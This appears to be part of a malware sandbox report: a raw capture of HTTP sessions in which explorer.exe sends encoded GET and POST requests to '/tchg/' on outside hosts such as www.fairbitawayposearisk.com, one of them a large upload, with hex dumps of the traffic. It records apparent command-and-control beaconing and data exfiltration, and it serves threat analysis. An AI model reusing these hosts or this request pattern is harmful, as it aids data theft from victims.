H4uUn~-HeCsyBCCc3(jAe0JSIuHxMVXq0l7MxJg0PRyb1F7xlFrY9406Jj_WTR53-~ZaVhVwLwu2D92d2zVSNL6WWRk6_DdtXvjxucrTn4B4PMRFbTDT9MC0_a3l_py5ZG_wO6cTftsDN5o1wD61Ne946lrn_ETE_elPsJq3rG99sScuPKwuRBj4-3Hjlt1~IsdtRVK6hsz~4MihbjC6cGRYAexNE6EGpD0uvQvMbjHqYxULMLO8huUyYScLPWhoRTk1Lg9fmereZC2YMWzvwp12tep8VXt4K5t~ywUzwlJBVHW3GLytmGHTTq79mTFkt5ehClWHgB3G-(LP1gZxLlz1VaJQJwdRzI22CYlii~JmxG5RztCSsrb6zFPEfJP3KvU6mjqwxqQ9rYM3SErWKMf1adKXJQ5b4eagywlL96frjMY336JLJG2E9y1B_NricPX5APT5HsTrzVqgZf-aNPVi-d9IjxYW1~W91dT2hE71Zg5MbESVpeAv_YLXL3RIR5niMcWUAsrEMqyiivX1J5Kas9Ehrox0RKe0nfF1dBVnrOJjd0yg-CmEDQbYi9OxB6kxu8v~AxpuwkWDUplmOUCMD7mNEGj3Os8OF6PmNXs1igDc6vNDazgKC0T7vKpaphMVX~EIY8KRsd7ijFPmYq8i9mbjnGmtvt5pxKSloqh7vaLWEhuqkwdUq9XjhgB(rzKo23-xDXX2YVpE2r2OKIEI_DxGQqPZaGQI_h1OJhCyOx4M_1ip0KnYxXquV3ZBxbqEzvw2nKqDAOXV27ItKsJO1tCDU~Xo-uGpWcJkgSrI9kTQE3GFy7YZzaPi-6IPyWW8wxkNJhNZXGkqYLJVCm7E1xVSTlIdLBdOLfu7VGaU7GEz9YfChF-dYRfDJCO4-ew0kIYvDdLZ4LNp0QD2h9dw0bCJxDvQwOW97jkg6xA4VtKTt41NDF68VKSnDm0XFxFGOBxSPg6TOzKuVZR4z2VQWNDRrpclFcY5S43TVqcLXOgOtSk8Pr5okFjFIIB5tfeEcg0yG0uyhB0
                                                                                                                    May 30, 2023 11:09:07.434878111 CEST605INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.6.2
                                                                                                                    Date: Tue, 30 May 2023 09:09:07 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                                                                                                                    May 30, 2023 11:09:07.434999943 CEST608OUTData Raw: 68 7a 4b 36 65 30 4f 65 7a 4a 57 32 38 4c 6f 6a 74 6d 39 42 6e 38 69 4d 44 45 79 31 6f 52 47 42 5a 57 6e 31 31 49 72 55 54 34 59 67 34 7a 6b 48 57 7a 4a 39 74 55 46 44 37 50 50 55 4a 57 71 4a 4e 28 56 6c 44 32 31 4f 4a 37 41 53 5f 76 6b 75 74 61
                                                                                                                    Data Ascii: hzK6e0OezJW28Lojtm9Bn8iMDEy1oRGBZWn11IrUT4Yg4zkHWzJ9tUFD7PPUJWqJN(VlD21OJ7AS_vkutaRvaFR54cpkRr-REqW1qphRvOLB60OF8zfmNnQIg~VI1Joh4O6iDscAaPGE_mMg1babIvCxbZfuZf3QexB6rk-DIH932RmSLwxTHJj5s9SsRH8qmd4uX59ux239loXg_DOe24pirEsvGrk1zathUSWpzvpPMlmL8W3
                                                                                                                    May 30, 2023 11:09:07.435127020 CEST611OUTData Raw: 54 32 6a 57 73 51 56 62 6e 43 78 6b 71 4b 6d 4b 52 44 53 39 33 49 76 72 39 6c 33 68 37 46 44 56 66 65 78 34 76 62 4e 30 52 59 71 46 6d 77 70 75 57 71 61 72 35 46 55 62 77 45 65 79 6e 5a 42 6f 30 6b 4f 51 4f 70 41 66 58 34 74 6d 52 35 62 69 64 53
                                                                                                                    Data Ascii: T2jWsQVbnCxkqKmKRDS93Ivr9l3h7FDVfex4vbN0RYqFmwpuWqar5FUbwEeynZBo0kOQOpAfX4tmR5bidSAdR(k1YKcci88VFjv~_LwSZlEqHcgwr4p5cad5tzAjp4GkIoi~ODfg-5Smlj2TrDWc3qXgzMjh-BDgaNObJpPc3N84Vs7k0ccil4lBPJ1OkHjcnoCfmjDwQ3j~7myHBmipPphaBLyIk~h8IpkYz1Z420I~C3phOv8
                                                                                                                    May 30, 2023 11:09:07.435340881 CEST616OUTData Raw: 6f 75 79 34 55 4c 32 7e 79 53 38 7a 57 71 42 7e 65 6e 30 78 30 63 43 57 35 79 48 4e 54 7a 57 44 65 37 51 7a 53 73 2d 79 61 5a 32 4a 4f 61 5a 62 53 6d 44 59 62 6a 6f 79 39 57 79 48 74 79 78 4d 35 6e 69 6d 75 51 57 55 7a 50 41 4c 55 37 49 54 38 57
                                                                                                                    Data Ascii: ouy4UL2~yS8zWqB~en0x0cCW5yHNTzWDe7QzSs-yaZ2JOaZbSmDYbjoy9WyHtyxM5nimuQWUzPALU7IT8Wcf8oOssUXMp19sM8R2W7Uv8jTovmEBRV6pKn9WueSZ4AgR_gJ5LOqi28rfWG2JVygQnU4gKf3d-BUPahpaqjwyPeH5YvNrnfcrm2hkEkpJGYIk1ZmNT5USc~jT9GWCCo41XBoVtZQUNf9hcVgzoAzWurO3adVBh7l
                                                                                                                    May 30, 2023 11:09:07.435532093 CEST622OUTData Raw: 58 45 54 32 52 43 4b 72 4a 6e 6f 5a 75 71 76 6c 6c 48 34 64 42 46 43 4c 7a 74 39 48 75 31 4b 7a 6f 78 4f 6a 47 6d 68 78 57 7e 6f 54 55 6b 47 4d 6d 7e 73 49 7a 6a 53 50 7a 78 52 4f 4e 65 63 4b 69 48 30 31 57 28 47 71 33 68 63 67 72 51 67 31 39 6d
                                                                                                                    Data Ascii: XET2RCKrJnoZuqvllH4dBFCLzt9Hu1KzoxOjGmhxW~oTUkGMm~sIzjSPzxRONecKiH01W(Gq3hcgrQg19msJnEXmyHH0XV6O91EC0IxY88jYH9leIQFWba95owWZERo8Z4S0B1IC0~PLNGoe0FQ3x~NzlPbCOOh0KYkqaOdH8VjuEdIqasxaJzIvV7wDO4s4ri2QJkFpg~_mY6IaTN7wSs64vhU(yPmiFHAD4p_3P(FvUzf3NQw
                                                                                                                    May 30, 2023 11:09:07.435668945 CEST623OUTData Raw: 48 50 36 78 68 4e 6b 38 63 37 45 39 6c 47 4c 31 75 6e 51 7e 6f 7a 39 59 73 4a 45 62 71 46 4c 74 35 42 61 69 51 28 2d 48 58 49 31 6c 68 44 4b 53 6b 6e 5f 6b 6f 68 6d 77 47 35 35 28 5a 57 43 4e 63 64 33 4a 51 7a 30 70 62 28 4a 36 58 51 58 47 69 49
                                                                                                                    Data Ascii: HP6xhNk8c7E9lGL1unQ~oz9YsJEbqFLt5BaiQ(-HXI1lhDKSkn_kohmwG55(ZWCNcd3JQz0pb(J6XQXGiIM7smdQE4gpKTAs2R6YKGdrvF57OwpzH87FwUjDJrVDogA04ffCtOkFgVqSR3zU0d_9uAfmNcACkpmdYV-oEOu00BgrU4l0W62gf(IfIpuDG7vsD7d5JE89ldBtZFVVUg14SnypG48T9FuRIG-bnQ2XBVUK2hesNyc
                                                                                                                    May 30, 2023 11:09:07.435826063 CEST631OUTData Raw: 76 6a 4c 4a 6b 44 73 55 6e 78 76 52 6e 4d 76 69 5f 61 67 61 4f 4e 4d 44 43 4a 36 6b 69 6c 52 36 6b 34 45 46 4c 31 52 51 4d 72 50 7e 69 6c 75 78 33 58 6f 5a 37 4f 66 59 5f 64 4d 62 64 64 61 7a 4b 6c 36 67 50 58 48 69 61 48 6e 55 68 42 65 73 62 35
                                                                                                                    Data Ascii: vjLJkDsUnxvRnMvi_agaONMDCJ6kilR6k4EFL1RQMrP~ilux3XoZ7OfY_dMbddazKl6gPXHiaHnUhBesb5WQcCmaWr1PjXDFYUZx-l8~uAbBYQ_Y2(_SmXi6r0KSn1p3y6VaKwkcPwQNvJxFp4WyENT~0x4FYNA~5QgVj6aG7(BpEMtJhMKhTGazpGgjG2Ps6deoupsvgJZs30MouHvywA37Dd0gzzchZPMu2~0oDvh0slntiKf
                                                                                                                    May 30, 2023 11:09:07.447365046 CEST639OUTData Raw: 4b 28 44 53 51 59 4a 76 41 50 6f 37 49 46 31 4d 76 4c 74 55 57 30 6e 36 6a 77 2d 77 47 6a 35 75 58 70 34 61 51 6e 4d 37 50 74 61 76 53 4e 74 37 55 4b 54 74 37 42 36 73 6b 70 64 74 47 76 69 48 31 54 56 6e 78 43 68 4d 7a 59 73 75 52 69 38 7a 55 48
                                                                                                                    Data Ascii: K(DSQYJvAPo7IF1MvLtUW0n6jw-wGj5uXp4aQnM7PtavSNt7UKTt7B6skpdtGviH1TVnxChMzYsuRi8zUH58k~MM4CT(PjDgr8CiGwMUZjaNF7JkpU_Rtj1(1O2TSBgOvIsWizSWyPzWSgs04qYdgulmv0uq1U75ZweyBpfaR~AAVi09AjOIgB3Rn6AbkiI(IS6g9xqD-Um2icMPobiUfkx~Wm8xFwvaD9CbphzSOXpS9Iu97mc
                                                                                                                    May 30, 2023 11:09:07.447489977 CEST645OUTData Raw: 2d 47 54 58 36 76 70 75 61 55 68 57 33 28 70 52 4c 49 6c 6b 33 6c 61 68 55 35 52 76 6e 55 76 76 4c 6a 61 45 47 4e 64 65 37 75 76 44 52 70 68 61 39 53 57 47 34 4f 66 36 53 67 47 74 67 32 54 32 6a 66 49 6f 35 69 39 6f 49 42 52 7e 38 42 6e 7e 43 7a
                                                                                                                    Data Ascii: -GTX6vpuaUhW3(pRLIlk3lahU5RvnUvvLjaEGNde7uvDRpha9SWG4Of6SgGtg2T2jfIo5i9oIBR~8Bn~Cz40AQN5IEBZJBSr_J500~3B5fRBjlf09fD12cNznZ-l6Ik(Ik8Fcea(Kw6tai4IRZEm2ZqU9ZrHFmBe_lyp-cYitIIu-IKuf0_AZpsHdvJAoCnV3YYk6BrJy(dnqQyKm6BV0kr3svURZrrvcw-Npad6wZqoC7ZDFUa


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    22192.168.11.2049781130.185.109.7780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:09.951790094 CEST646OUTGET /tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.printmyride.store
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:09:09.962331057 CEST646INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.6.2
                                                                                                                    Date: Tue, 30 May 2023 09:09:09 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 168
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    23192.168.11.2049782216.108.231.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:15.159581900 CEST647OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.fairbitawayposearisk.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.fairbitawayposearisk.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.fairbitawayposearisk.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 63 57 49 75 4c 7a 32 36 63 6f 61 55 44 49 57 36 69 59 44 43 53 63 68 52 4d 39 72 45 37 50 47 57 73 49 62 47 4d 31 4c 53 4e 6c 56 68 53 56 67 48 55 71 43 31 36 4a 4c 41 32 35 7e 66 6b 78 53 77 32 36 6f 41 72 45 74 66 5a 62 56 51 56 66 77 63 4f 65 65 36 52 71 36 31 79 7a 42 4e 68 56 62 76 6e 31 50 42 53 4a 77 49 57 53 35 43 45 6c 76 4c 53 4b 4e 52 6e 48 75 54 38 57 45 41 4a 32 4e 74 32 32 65 75 6f 4e 56 5a 6f 44 48 56 79 42 47 37 59 6d 6a 51 52 6a 45 46 50 4b 7e 6e 64 62 58 43 46 31 4a 46 4d 4d 65 78 79 53 57 5a 32 38 61 68 69 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=cWIuLz26coaUDIW6iYDCSchRM9rE7PGWsIbGM1LSNlVhSVgHUqC16JLA25~fkxSw26oArEtfZbVQVfwcOee6Rq61yzBNhVbvn1PBSJwIWS5CElvLSKNRnHuT8WEAJ2Nt22euoNVZoDHVyBG7YmjQRjEFPK~ndbXCF1JFMMexySWZ28ahig).
                                                                                                                    May 30, 2023 11:09:15.846158981 CEST648INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:09:15 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Content-Length: 320
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 75 73 72 5f 69 64 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 69 73 70 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 64 74 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                                                                                    Data Ascii: <br /><b>Notice</b>: Undefined variable: usr_id in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: isp in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: dt in <b>/var/www/html/newred.php</b> on line <b>51</b><br />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    24192.168.11.2049783216.108.231.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:17.846008062 CEST649OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.fairbitawayposearisk.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.fairbitawayposearisk.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.fairbitawayposearisk.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 63 57 49 75 4c 7a 32 36 63 6f 61 55 43 70 6d 36 75 66 66 43 46 73 68 4f 44 64 72 45 30 76 47 53 73 50 54 47 4d 30 66 43 4d 54 39 68 53 31 77 48 56 6f 71 31 35 4a 4c 41 39 5a 7e 65 70 52 53 72 32 36 56 33 72 46 52 66 5a 62 42 51 57 4d 34 63 66 2d 65 35 4a 36 36 36 34 54 42 4f 72 31 62 70 6e 31 79 6f 53 4c 4d 49 52 69 46 43 46 6d 48 4c 59 34 6c 51 32 58 75 64 74 32 45 44 41 57 4e 5a 32 32 6a 54 6f 49 68 6a 6f 31 76 56 31 67 6d 37 5a 6d 6a 54 66 54 46 50 42 61 28 62 54 62 69 61 4e 30 39 69 63 74 53 72 39 7a 33 64 77 64 66 51 79 51 4f 57 54 57 4c 62 4f 5a 6a 5f 78 51 72 38 6c 6e 76 67 57 63 7a 6a 74 4b 65 35 6e 6f 55 53 47 52 53 55 56 45 47 70 7a 65 6a 54 30 39 5a 71 52 53 38 69 4f 36 63 38 6f 5f 64 6e 5a 66 41 63 7e 68 37 56 35 58 52 35 35 79 49 38 57 32 47 77 52 4f 55 69 58 4a 5a 68 73 5f 34 6c 69 66 32 50 73 5a 76 43 33 5f 68 61 45 51 79 44 4d 68 4a 48 6d 31 73 31 49 2d 46 38 4e 42 57 6e 77 50 35 7a 30 54 49 6c 72 5a 68 4d 78 32 79 56 6d 59 44 38 68 74 66 38 65 37 45 67 37 7a 54 45 7e 71 67 6e 69 79 56 37 34 61 5a 2d 7a 70 48 66 62 69 6a 50 48 51 4c 74 4f 78 77 68 39 51 55 30 51 52 79 6b 4b 30 46 67 38 42 68 77 76 4d 35 31 77 63 30 73 63 51 53 55 77 4b 46 52 6e 6f 4f 62 31 31 70 4b 68 6d 4e 37 6b 33 67 47 41 39 4c 37 7e 4e 4d 2d 42 74 49 62 34 4a 51 72 52 68 73 49 75 6d 55 39 74 57 6d 6b 79 41 69 5a 64 6c 4c 77 66 75 47 46 52 7a 4a 4d 7e 44 76 44 37 5f 4b 43 76 66 6a 44 31 65 4d 62 6d 39 39 55 50 51 52 59 6d 57 67 64 4e 72 79 77 49 4d 58 30 41 53 62 39 36 2d 72 33 64 4a 67 67 71 77 6b 2d 53 37 62 75 46 62 4b 41 69 4a 77 36 4d 55 4d 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=cWIuLz26coaUCpm6uffCFshODdrE0vGSsPTGM0fCMT9hS1wHVoq15JLA9Z~epRSr26V3rFRfZbBQWM4cf-e5J6664TBOr1bpn1yoSLMIRiFCFmHLY4lQ2Xudt2EDAWNZ22jToIhjo1vV1gm7ZmjTfTFPBa(bTbiaN09ictSr9z3dwdfQyQOWTWLbOZj_xQr8lnvgWczjtKe5noUSGRSUVEGpzejT09ZqRS8iO6c8o_dnZfAc~h7V5XR55yI8W2GwROUiXJZhs_4lif2PsZvC3_haEQyDMhJHm1s1I-F8NBWnwP5z0TIlrZhMx2yVmYD8htf8e7Eg7zTE~qgniyV74aZ-zpHfbijPHQLtOxwh9QU0QRykK0Fg8BhwvM51wc0scQSUwKFRnoOb11pKhmN7k3gGA9L7~NM-BtIb4JQrRhsIumU9tWmkyAiZdlLwfuGFRzJM~DvD7_KCvfjD1eMbm99UPQRYmWgdNrywIMX0ASb96-r3dJggqwk-S7buFbKAiJw6MUM.
                                                                                                                    May 30, 2023 11:09:18.533574104 CEST650INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:09:17 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Content-Length: 320
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 75 73 72 5f 69 64 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 69 73 70 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 64 74 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                                                                                    Data Ascii: <br /><b>Notice</b>: Undefined variable: usr_id in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: isp in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: dt in <b>/var/www/html/newred.php</b> on line <b>51</b><br />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    25192.168.11.2049784216.108.231.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:09:20.535238981 CEST663OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.fairbitawayposearisk.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.fairbitawayposearisk.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.fairbitawayposearisk.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 63 57 49 75 4c 7a 32 36 63 6f 61 55 43 70 6d 36 75 66 66 43 46 73 68 4f 44 64 72 45 30 76 47 53 73 50 54 47 4d 30 66 43 4d 54 31 68 53 6d 49 48 55 4a 71 31 34 4a 4c 41 79 4a 7e 62 70 52 54 35 32 36 4e 7a 72 46 64 50 5a 59 35 51 57 39 6f 63 66 72 71 35 63 4b 36 33 30 7a 42 4d 68 56 62 39 6e 31 50 5f 53 4b 6f 59 57 53 78 43 45 68 72 4c 53 76 35 52 7e 6e 75 54 74 32 45 45 58 47 4e 37 32 32 6d 4d 6f 49 6c 6a 6f 7a 76 56 30 54 65 37 56 52 33 54 57 6a 46 4f 48 71 28 55 63 37 69 56 4e 30 35 63 63 74 53 52 39 78 62 64 77 64 28 51 67 44 6e 41 51 32 4c 62 43 35 6a 2d 31 51 6e 77 6c 6a 50 6f 57 63 48 6a 74 49 4f 35 6d 49 55 53 44 31 47 58 57 6b 47 76 6b 2d 6a 2d 77 38 6b 47 52 53 70 47 4f 36 49 38 6f 4d 68 6e 57 4d 6f 63 35 45 50 56 77 58 52 37 33 53 49 76 59 6d 48 70 52 4f 45 45 58 4e 6c 58 73 5f 73 6c 6a 2d 57 50 6f 4c 4c 64 7e 5f 68 59 59 41 79 57 49 68 56 4c 6d 31 38 78 49 2d 46 53 4e 46 4f 6e 77 2d 4a 7a 31 53 49 6d 72 4a 68 4c 6b 6d 7a 58 39 6f 50 71 68 73 7a 4f 65 36 38 77 37 79 58 45 76 36 67 6e 33 68 39 34 6a 36 5a 35 78 70 48 4e 66 69 69 56 48 51 47 45 4f 77 30 4c 7e 67 34 30 66 41 4f 6b 63 45 46 6e 74 52 68 30 35 38 35 33 6e 4d 30 73 63 51 4f 2d 77 4b 42 52 6e 63 43 62 30 47 42 4b 6b 31 6c 37 6f 58 67 63 41 39 4c 78 7e 4e 41 64 42 75 6f 35 34 49 68 4d 52 69 41 49 75 58 45 39 73 54 4b 6e 33 77 69 63 4d 31 4b 79 51 4f 36 65 52 7a 56 45 7e 44 28 31 36 4d 4f 43 75 66 7a 44 69 4f 4d 59 77 4e 38 65 66 41 52 4b 77 6d 73 42 4e 72 75 4b 49 4e 54 6b 41 51 4c 39 36 35 65 78 48 35 63 48 6f 43 41 4d 52 4d 54 36 46 34 69 79 6c 6f 34 37 54 6a 50 78 77 57 67 4c 65 48 78 48 6c 6c 4e 31 46 36 72 67 76 6b 5a 6e 78 6f 47 6e 57 42 6f 42 4f 4a 7e 56 36 5a 77 50 51 57 4f 58 7e 30 30 69 37 4a 58 4b 6e 6e 6b 53 45 53 37 2d 7a 76 71 4e 77 6d 44 30 45 56 51 76 4d 6c 43 5f 42 4d 71 6a 39 6c 79 31 48 65 54 44 4f 79 43 33 74 77 67 49 6a 66 78 78 36 58 31 58 34 39 67 51 41 4a 70 39 6e 59 7a 77 54 76 72 59 62 72 79 74 67 33 70 6c 39 62 41 4b 7e 30 48 45 36 77 4a 51 61 5f 47 46 43 67 48 36 71 5a 4a 30 6b 57 41 48 39 6a 65 71 7a 41 54 66 51 38 37 53 42 64 6a 59 58 73 73 73 68 74 58 78 6c 44 39 55 62 4b 6b 4e 56 4c 53 42 4b 77 45 6f 75 77 6c 42 6d 39 66 7a 42 50 69 6e 31 79 31 5f 57 6a 42 38 6d 2d 45 45 6b 36 6c 39 68 50 41 76 61 56 4f 4a 61 6a 69 4f 52 72 47 6f 47 5f 56 39 62 47 50 46 4d 41 28 32 36 5a 28 41 79 71 50 74 49 52 53 48 51 44 44 46 62 39 79 4f 4b 69 53 38 6d 47 61 33 6b 6d 49 4f 37 44 74 52 6e 69 56 5f 35 6e 34 37 67 71 70 78 73 71 48 63 54 79 36 35 38 6d 32 6c 67 6f 7a 5f 4a 33 36 49 41 5f 6a 2d 6e 44 79 39 4f 33 54 51 59 5f 52 71 36 43 62 6d 50 6f 41 71 77 48 4b 4b 4b 47 45 6f 51 54 57 6f 33 56 68 71 7e 71 54 49 79 4c 6b 73 56 63 68 45 33 79 73 5a 70 6f 63 43 64 66 55 77 69 6d 4a 66 7a 54 57 31 4e 6b 61 6d 7a 77 39 33 39 41 49 6b 72 68 7e 6d 53 61 46 64 67 50 5a 47 43 72 61 53 42 59 30 64 6c 78 34 79 73 64 71 54 5a 61 77 50 7e 63 4e 34 66 45 71 74 51 79 6c 63 6f 59 4c 45 4d 38 65 31 45 68 4f 52 69 4f 57 7a 7a 78 63 58 48 79 67 30 48 66 66 6a 38 6a 65 7a 53 31 51 4d 44 61 59 47 7e 68 65 51 72 6b 32 36 73 4f 4c 4d 4d 7a 79 49 6c 70 35 72 56 4a 6e 74 48 53 32 4e 7e 45 65 34 70 43 68 64 6d 64 65 32 44 6c 45 70 30 4a 46 50 72 70 50 66 4e 65 6a 35 66 47 5a 4b 79 57 61 34 6f 70 57 73 7e 62 43 58 36 72 4b 63 52 49 69 68 4b 56 31 65 42 63 4b 57 73 68 72 79 78 50 6c 54 59 45 49 6e 28 51 61 75 4f 72 77 39 4c 53 79 53 45 4a 4d 76 34 